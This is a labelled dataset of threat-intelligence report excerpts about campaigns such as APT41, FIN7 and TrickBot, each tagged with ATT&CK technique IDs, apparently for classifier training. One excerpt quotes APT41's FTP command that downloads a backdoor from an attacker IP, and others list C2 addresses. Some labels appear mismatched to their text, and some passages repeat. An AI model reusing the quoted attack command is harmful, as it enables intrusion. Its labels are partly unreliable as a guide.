{"text1":"In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process","labels":"['T1566.001']"}
{"text1":"The dropper extracts modules from these resources by seeking a specific offset and reading a specific number of bytes as the length of the ciphertext. The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64 encode string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module","labels":"['T1140']"}
{"text1":"Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment","labels":"['T1016']"}
{"text1":"Curl is used to send the AWS credentials to TeamTNT\u2019s server, which responds with the message \u201cTHX","labels":"['T1071.001']"}
{"text1":"The Helminth executable is able to communicate with its C2 server via HTTP and via DNS queries in very similar ways to the Helminth script variant. In fact, the DNS beacons follow the same structure and sequence as the script variant of Helminth discussed in the previous section","labels":"['T1573.001']"}
{"text1":"All this information was then sent to one of the following domains: G1 also had the ability to execute commands remotely on the infected host machine at the author's will","labels":"['T1059.003']"}
{"text1":"NoComm \u2013 No command, which causes the script to keep sending POST requests. Base64 string \u2013 A module to execute. The module is encrypted with a simple substitution cipher and encoded in base64","labels":"['T1573.001']"}
{"text1":"Those payloads consist of a legitimate and signed Microsoft executable used as a DLL search-order hijacking host and a malicious DLL loaded by that executable. The malicious DLL is a ShadowPad loader","labels":"['T1574.001']"}
{"text1":"Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018\/usr\/bin\/ftp -o \/tmp\/bsd ftp:\/\/test:[redacted]\\@66.42.98[.]220\/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor","labels":"['T1071.002']"}
{"text1":"Given their capability and sophistication, it is unlikely that IRON RITUAL's intrusions will leave sufficient artifacts to allow researchers to associate their activities with previous or future Russian cyber espionage operations. The group has used malware including the SUNBURST (also known as Solorigate) backdoor and in-memory Cobalt Strike delivered using the TEARDROP and RAINDROP loaders. CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool","labels":"['T1550']"}
{"text1":"Let\u2019s look at an example. During our investigation of an infection at a computer game company, we found that malware had been created for a particular service on the company\u2019s server. The malicious program was looking for a specific process running on the server, injected code into it, and then sought out two places in the process code where it could conceal call commands for its function interceptors. Using these function interceptors, the malicious programs modified process data which was processed in those two places, and returned control back. Thus, the attackers change the normal execution of the server processes. Unfortunately, the company was not able to share its targeted application with us, and we cannot say exactly how this malicious interference affected gaming processes","labels":"['T1057']"}
{"text1":"1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3. the remote location is http:\/\/185.203.119[.]184\/Dropbox\/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. and only continues if the file exists","labels":"['T1564.001']"}
{"text1":"The adversary uses Cobalt Strike as framework to manage their compromised systems. We observed the use of Cobalt Strike\u2019s C2 protocol encapsulated in DNS by the adversary in 2017 and 2018. They switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is they made use of a cracked\/patched trial version of Cobalt Strike. This is important to note because the functionalities of Cobalt Strike\u2019s trial version are limited. More importantly: the trial version doesn\u2019t support encryption of command and control traffic in cases where the protocol itself isn\u2019t encrypted, such as DNS. The DNS-responses weren\u2019t logged. This means that only the DNS C2 leaving the victim\u2019s network was logged. We developed a Python script that decoded and combined most of the logged C2 communication into a human readable format. As the adversary used Cobalt Strike with DNS as command & control protocol, we were able to reconstruct more than two years of adversary activity","labels":"['T1071.004']"}
{"text1":"The TrickBot module used for credential harvesting is pwgrab64. As with all modules launched by the TrickBot core, pwgrab64 is installed into a subfolder, usually named either \u201cmodules\u201d or \u201cdata,\u201d and modified the following registry value","labels":"['T1112']"}
{"text1":"This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility. More information on this technique and the CARROTBAT malware family may be found within the Appendix","labels":"['T1105']"}
{"text1":"REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. Finally, REvil terminates execution","labels":"['T1071.001']"}
{"text1":"Anchor_DNS was able to stay under-the-radar by using specific execution flags. If these command-line arguments are not supplied, the Anchor_DNS terminates","labels":"['T1480']"}
{"text1":"The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal","labels":"['T1102.002']"}
{"text1":"The dns.ps1 script is also responsible for communicating with the C2 server, but it uses DNS queries to send data to the server. The DNS queries sent by this script are queries to subdomains on the same domain as the C2 server, which contains system information or the contents of files from the system. The subdomain of the DNS request that acts as the initial C2 beacon has the following structure","labels":"['T1012']"}
{"text1":"Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion","labels":"['T1059.001']"}
{"text1":"On the first contact, it will send an identification of the victim based on the hard disk volume serial number. Talos didn't identify any kind of anti-sandboxing mechanisms on it, either","labels":"['T1082']"}
{"text1":"When checking network connection with the \u201cnetstat\u201d command, both cases use the \u201c-naop\u201d option in conjunction with the \u201ctcp\u201c - Filtering the result, both cases use the \u201cfindstr\u201d command instead of \u201cfind","labels":"['T1049']"}
{"text1":"This module was delivered, like many other tools, in a 7z self-extracting archive. Inside, there was a password-protected RAR archive containing a few files","labels":"['T1027']"}
{"text1":"For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP","labels":"['T1071.001', 'T1041', 'T1071', 'T1132']"}
{"text1":"FIN5, which earlier this year was profiled by researchers at Trend Micro and has been in action since at least 2008, uses real credentials from the victim organization's virtual private network, Remote Desktop Protocol, Citrix, or VNC. Vengerik says the attackers got those credentials via third parties associated with the victims' POS systems","labels":"['T1078', 'T1133']"}
{"text1":"The first action performed by the crypter code is to check some specific registry key. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique","labels":"['T1012', 'T1497.001']"}
{"text1":"The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April. The worm specifically scans for the existence of the DoublePulsar backdoor on compromised systems. If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock. The second thread scans randomly chosen external IP addresses","labels":"['T1018']"}
{"text1":"Remexi developers use the C programming language and GCC compiler on Windows in the MinGW environment. The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive","labels":"['T1053.005', 'T1547.001']"}
{"text1":"The actor has used this method on its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExw and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicatetoken. The DesiredAccess parameter of this function specifies the requested access right for the new token. In this case the actor passed TOKEN_ALL_ACCESS as DesiredAccess value which indicates that the new token has the combination of all access rights of this current token. The duplicated token is then passed to ImpersonateLoggedOnUser and then a cmd instance is spawned using CreateProcessWithLogomW. At the end the duplicated token is assigned to the created thread using NtSetINformationThread to make it elevated","labels":"['T1134.002']"}
{"text1":"The main infection vector for Poseidon is the use of spear-phishing emails including RTF\/DOC files, usually with a human resources lure. Poseidon\u2019s toolkit displays an awareness of many antivirus providers over the years, attempting to attack or spoof these processes as a means of self-defense for their infections","labels":"['T1036.005']"}
{"text1":"On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. This repeat attack may suggest that the adversaries have lost their foothold in the targeted organization, or that it may be considered a high value target. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1204.001']"}
{"text1":"PlugX \u2014 A remote access tool notable for communications that may contain HTTP headers starting with \"X-\" (e.g. X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1071.001']"}
{"text1":"1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs","labels":"['T1204.001']"}
{"text1":"After the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data sits in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. During that time, the point-of-sale malware opens up the process memory searching for elements related to credit card information","labels":"['T1005']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1053.002', 'T1053.005']"}
{"text1":"The kernel driver is a commercial product that the attackers are abusing called RawDisk by EldoS Corporation, which provides direct access to files, disks and partitions. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. With the kernel driver installed, the wiper can begin writing to protected system locations, such as the master boot record (MBR) and partition tables of storage volumes. If the wiper is configured with the \"E\" setting, the wiper will encrypt the contents of the file using a random value as a key and the RC4 algorithm. If configured with the \"R\" setting, the wiper will overwrite files with the random values that would be used as a key in \"E","labels":"['T1561.002', 'T1485', 'T1485']"}
{"text1":"The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another. We know that the threat actor has used the \u201c.me\u201d TLD in their past campaigns against some academic intuitions and this is still the case, along side \u201c.tk\u201d and \u201c.cf","labels":"['T1583.001']"}
{"text1":"The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443. After connecting to its C2 server, RCSession checks in with an encrypted beacon and then awaits instruction. The ORat tool, which appears to be used less frequently by the group, communicates over TCP port 80 using a raw socket protocol (not HTTP","labels":"['T1573']"}
{"text1":"Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway","labels":"['T1016']"}
{"text1":"The two main changes are the obfuscation and the network protocol to communicate to the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012): The C2 encoding communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: The exfiltrated data is appended to the URL. Here is the pattern: hxxp:\/\/C2_domain\/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp:\/\/www[.]amanser951[.]otzo[.]com\/uiho0.0.0.0edrftg.txt","labels":"['T1041']"}
{"text1":"The malware sets information like the C2 server, ID, the downloaded payload, and the decoded project.aspx in a registry key under \u201cHKCU\\Software\\ApplicationContainer\\Appsw64\u201d. These keys will be used in the second stage","labels":"['T1112']"}
{"text1":"The Helminth executable variant is able to run batch scripts provided by the C2 server, which is very similar to the script version of this Trojan. The executable variant has one additional capability that is not present in the script version, which involves the ability to log keystrokes via a supplemental keylogger module","labels":"['T1059.003', 'T1115', 'T1056.001']"}
{"text1":"The ransom note instructs the victim to use a unique URL to decrypt their files. Victims must provide the key and extension name included in the ransom note. The key specified in the ransom note is the Base64-encoded representation of the encrypted stat data stored in the registry","labels":"['T1486']"}
{"text1":"1) Ferocious dropper: The Excel dropper, after the user opens it and disables the protected mode, will execute a series of formulas placed in a hidden column. Initially, they will hide the main spreadsheet that requested the user to \u201cenable editing\u201d, then unhide a secondary spreadsheet that contains the decoy, to avoid raising suspicion. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. 5) Ferocious run-1: After the macro finishes writing to disk, it runs winrm.vbs using explorer.exe. The VBS script will also add two important registry keys for persistence. The persistence technique observed in all intrusions uses COM hijacking. In this technique, the threat actor is able to add a Class ID in the current user registry hive (HKCU) referencing the malicious VBS script written previously to %ProgramData%\\winrm.vbs. Registry keys used for COM hijacking After the above execution chain, the Excel 4.0 macro will clean up and delete the winrm.vbs and winrm.txt files. 6) Ferocious run-2: The macro will continue after the cleanup by recreating and opening the same files, winrm.vbs and winrm.txt","labels":"['T1112']"}
{"text1":"All the strings used by the malware are encrypted and are decrypted by Rijndael\u00a0symmetric encryption algorithm in the \u201c<Module>.\\u200E\u201d function","labels":"['T1027']"}
{"text1":"They dumped specific hives from the Windows Registry, such as the SAM hive, which contains password hashes","labels":"['T1005']"}
{"text1":"Volexity's investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g","labels":"['T1550.004', 'T1606.001']"}
{"text1":"The legitimate DLL that would be used in this case has the size of roughly 600 KB, but here we have an obfuscated library that is over 600 MB. The large size of the file is intended to hamper analysis and detection. Once all empty sections have been removed from the library, the final payload is a binary of 27.5 MB","labels":"['T1027.001']"}
{"text1":"Generally, the malware uses AutoIt or VBS scripts added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions","labels":"['T1574.001']"}
{"text1":"Gamaredon is an advanced persistent threat (APT) group that has been active since 2013. From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group\u2019s activities","labels":"['T1140', 'T1059.005']"}
{"text1":"When you run the command, it sets all the required information about the AD FS to Azure AD for the federated domain. It also creates a relying party trust for the Azure AD to the local AD FS server. When a user is authenticated on AD FS, it creates a security token including claims about the user\u2019s identity. With Azure AD, two claims are used for authentication; UserPrincipalName and ImmutabledId. Basically, the ImmutableId could be any string, as long as it matches the ImmutableId attribute of the user object in Azure AD. Typically the ImmutableId is a base 64 encoded GUID of the user object in on-premises AD (to convert GUID to immutable ID see the tools page). Converting the domain to federated also creates two claim issuance rules. For short, the rules add the UserPrincipalName and ImmutableId claims of the logged in user to the security token. When security token is delivered to Azure authentication platform, it checks the token signature, and if it matches the trust, the user is granted access","labels":"['T1484']"}
{"text1":"NICKEL used compromised credentials to sign into victims\u2019 Microsoft 365 accounts through normal sign-ins with a browser and the legacy Exchange Web Services (EWS) protocol to review and collect victim emails. MSTIC has observed successful NICKEL sign-ins to compromised accounts through commercial VPN providers as well as from actor-controlled infrastructure","labels":"['T1133', 'T1078.004']"}
{"text1":"By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) contains the following formula that Excel will save to the \u201cA0\u201d cell in the worksheet","labels":"['T1204.002']"}
{"text1":"After the system reboots, the file \u201cAJWrDz.exe\u201d executes, which in turn triggers the side-loading of the malicious (and fake) DLL file \u201cdbghelp.dll\u201d. This malicious DLL file injects itself to Windows Media Player process \u2014 wmplayer.exe, and reflectively loads the renamed jesus.dmp file, \u201cAJWrDz.dmp","labels":"['T1055.001']"}
{"text1":"The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications","labels":"['T1027', 'T1573.001']"}
{"text1":"It also checks for the existence of various tools and utilities that malware analysts often run when analyzing malicious software. It also leverages Structured Exception Handling (SEH) to patch its own code. These measures are all designed to impede the analysis process and make it more expensive to identify what the malware is actually designed to do from a code execution flow perspective. Below the EAX register is stored in a variable to be reused later in order to allocate a heap memory chunk to initiate its own unpacked code. The malware also uses others techniques to make analysis significantly more difficult, like creating hundreds of case comparisons, which makes tracing code much harder. Below an example of several if conditional statements in pseudo code demonstrating this process and how it can result in impeding the ability to efficiently trace the code. In order to decrypt the malware code it's installs an exception handler, which is responsible for decrypting some memory bytes to continue it's execution. Below you can see the SEH has just been initialized: In the same routine, it performs the decryption routine for the following code. The strings are encrypted using an XOR value, however each string uses a separate XOR value preventing an easy detection mechanism. Below is some IDA Python code which can be used to decrypt strings","labels":"['T1027']"}
{"text1":"There are 2 ways by which Linux\/Ebury can choose a server where the DNS packets are sent. The second method uses an algorithm to generate a domain name dynamically. This domain name will be queried for its A and TXT records. The TXT record will be used to verify that it is under the control of the operators using public key cryptography. Details about the domain generation algorithm and the verification processed will be published later","labels":"['T1568.002']"}
{"text1":"After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. If the decrypted payload is valid, it picks a specific existing Windows Service \u2014 LanmanServer, which is run by svchost.exe \u2014 and injects the decrypted shellcode into the legitimate service","labels":"['T1055']"}
{"text1":"The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs","labels":"['T1056.001', 'T1056']"}
{"text1":"Process hollowing is a code injection technique that involves spawning a new instance of legitimate process (in this case c:\\windows\\syswow64\\explorer.exe) and then replacing the legitimate code with malware","labels":"['T1055.012']"}
{"text1":"The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. Below shows the RC4 key \"sV. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server","labels":"['T1573.001']"}
{"text1":"A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports","labels":"['T1140']"}
{"text1":"FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim\u2019s system. According to trusted third-party reporting, communication flows from the victim\u2019s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1","labels":"['T1090.002']"}
{"text1":"Ferocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who appear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the radar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew attention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm","labels":"['T1566.001']"}
{"text1":"The malware encrypts user files, demanding a fee of either $300 or $600 worth of bitcoins to an address specified in the instructions displayed after infection","labels":"['T1486']"}
{"text1":"In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules","labels":"['T1012']"}
{"text1":"Much of the code inside the script is from the library \u201cjs-cookie\u201d version 2.2.1. However, the attackers modified it and integrated a credit card skimmer into the original script. The skimmer binds at the events \u201cmousedown\u201d and \u201ctouchstart\u201d of the payment submit button","labels":"['T1119']"}
{"text1":"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. When the malicious RTF document is opened, two things happen that allow the attacker malware to run. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message","labels":"['T1203']"}
{"text1":"In addition to this, as reported by our peers at ESET last week, the group has also begun using a UEFI (Unified Extensible Firmware Interface) rootkit known as Lojax. Because the rootkit resides within a computer\u2019s flash memory, it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled","labels":"['T1014']"}
{"text1":"f) Hadoop YARN ResourceManager \u2013 Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability","labels":"['T1203', 'T1203', 'T1105']"}
{"text1":"shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit","labels":"['T1210']"}
{"text1":"The s.exe (SHA256: 04f48ed27a83a57a971e73072ac5c769709306f2714022770fb364fd575fd462) uploaded to the error2.aspx webshell is a self-extracting 7-zip archive that is an example of the HyperBro backdoor. According to Kaspersky and SecureWorks research, HyperBro is a custom backdoor developed and used by Emissary Panda in their attack campaigns. This sample of HyperBro is similar to the sample discussed in Kaspersky\u2019s research, specifically using a legitimate pcAnywhere application to sideload a DLL to decrypt, decompress and run a payload embedded within a file named \u2018thumb.db\u2019. Table 5 shows the three files associated with this HyperBro sample, which have the same file names as the self-extracting 7zip archives mentioned in Kaspersky\u2019s blog (SHA256 hashes: 34a542356ac8a3f6e367c6827b728e18e905c71574b3813f163e043f70aa3bfa and 2144aa68c7b2a6e3511e482d6759895210cf60c67f14b9485a0236af925d8233","labels":"['T1574.002']"}
{"text1":"The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps","labels":"['T1027']"}
{"text1":"COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe. COMSysApp service is added under the \u201cSvcHost\u201d key as a preliminary step to its execution in the context of svchost.exe. The malicious DLL is added as a service DLL of COMSysApp. COMSysApp service is restarted","labels":"['T1546.015']"}
{"text1":"One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143","labels":"['T1571']"}
{"text1":"Currently, Agent Tesla continues to be utilized in various stages of attacks. Agent Tesla is now able to harvest configuration data and credentials from a number of common VPN clients, FTP and Email clients, and Web Browsers. The malware has the ability to extract credentials from the registry as well as related configuration or support files. Our analysis of a swatch of current Agent Tesla samples reveals the following list of targeted software","labels":"['T1552.002', 'T1552.001']"}
{"text1":"Next, BoomBox downloads an encrypted file from Dropbox. For demonstration purposes, an example HTTP(s) POST request used to download the encrypted file from Dropbox is shown below","labels":"['T1071.001']"}
{"text1":"Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. The keylogger itself does not communicate with the C2 or write to disk. Instead, it writes it\u2019s keylog to a registry key that it uses as a buffer. During its operation, the RAT scrapes and clears this buffer before transmitting the logged keystrokes to the C2 server","labels":"['T1132.001']"}
{"text1":"The algorithm used by Dyre for generating the AES and IV from the first 48 bytes of data based on a rehashing scheme was commonly referred to as Dyre\u2019s derive_key function, this function was slightly changed in the new bot","labels":"['T1573.001']"}
{"text1":"Figure 1 \u2013 The wrapper DLL poses as a legitimate mpr.dll library, both by its name and version info","labels":"['T1036.005']"}
{"text1":"For this analysis, we looked at version 2.14.845, which has a configuration that differs from the others Dreambot versions in that the domain generation algorithm (DGA) is not used: therefore, the DGA variables and parameters are missing","labels":"['T1568.002']"}
{"text1":"Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. Instead, it writes it\u2019s keylog to a registry key that it uses as a buffer","labels":"['T1027', 'T1059.001']"}
{"text1":"As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443","labels":"['T1124']"}
{"text1":"As described in other blog posts, Remcos appears to be developed in C++. As the release notes show, it is actively maintained. 17, 2017 Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. A good example is the anti-analysis section: It is checking for an outdated artifact, the 'SbieDll.dll'. In our opinion, there are not many analysts using Sandboxie these days anymore. Below you can see the Remcos VMware detection code: The following is a code sample from aldeid.com: The blog referenced above has already described several functions of Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere when there is a need to decode or encode any data. Examples are registry entries, C2 server network communication or file paths shown below: The exepath registry data is base64-encoded, RC4-encrypted data. This can be converted into the typical RC4 pseudo code","labels":"['T1027']"}
{"text1":"The Word document has a malicious macro in it and, when opened by the victim, it will drop and execute a file in a specific folder","labels":"['T1204.002']"}
{"text1":"This time, APT15 opted for a DNS based backdoor: RoyalDNS. The persistence mechanism used by RoyalDNS was achieved through a service called \u2018Nwsapagent","labels":"['T1543.003']"}
